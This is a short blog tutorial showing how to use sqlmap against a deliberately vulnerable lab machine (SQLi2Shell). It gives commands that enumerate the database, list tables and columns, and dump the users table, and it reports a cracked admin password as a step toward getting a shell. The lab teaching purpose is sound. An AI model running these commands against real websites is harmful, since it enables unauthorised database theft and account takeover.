SQLi To Shell – SQLMAP

Hey everyone! This is a follow-up to the SQLi to Shell – Manual Injection tutorial. In this tutorial, I’m going to show how to use SQLMap to perform the same injection attack. I won’t be going through the entire challenge again of discovery, exploiting SQLi, and getting shell. I just want to focus on the SQL injection part, and show how much faster it can be when using a tool like SQLMap. Let’s go!

If you don’t have it running already, go ahead and fire up your SQLi2Shell machine, and make sure you have Kali running as well. In Kali, open a terminal window. This is where we’ll be typing our sqlmap commands.

We know my vulnerable URL was “http://192.168.1.187/cat.php?id=1“, so we’re going to use that in sqlmap.

Database Info
We’ll start out again getting some basic info about the database. Let’s get the current database name, and the current database user.

Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql –current-user –current-db

sqli2shell-sqlmap1

sqli2shell-sqlmap2

So we have that info, and notice how quickly SQLMap returned the data.

Table Names
Next, we’ll get the table names.

Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql –tables

sqli2shell-sqlmap3-tables

We’re going to focus on the “users” table.

Column Names
Now we want to get the column names for the “users” table.

Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql -T users –columns

sqli2shell-sqlmap-columns

Extract the Data
Now that we have the column names, we need to dump all the data that’s available.

Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql -T users -C login,password –dump

sqli2shell-sqlmap-username

Perfect! Now we have the username, and password hash, and sqlmap was able to crack the password for us, so the password is “P4ssw0rd”.

You can now take this information, login to the Admin page, and continue with getting your shell on the box.

That will do it for this one. I know this was a short one, but I wanted to show how simple, and fast SQLMap is to use. You still need to know how to perform the attack manually, and once you get that down, feel free to bring SQLMap into the mix to get the job done faster!

Thanks for checking it out!

Be Awesome!

-Jason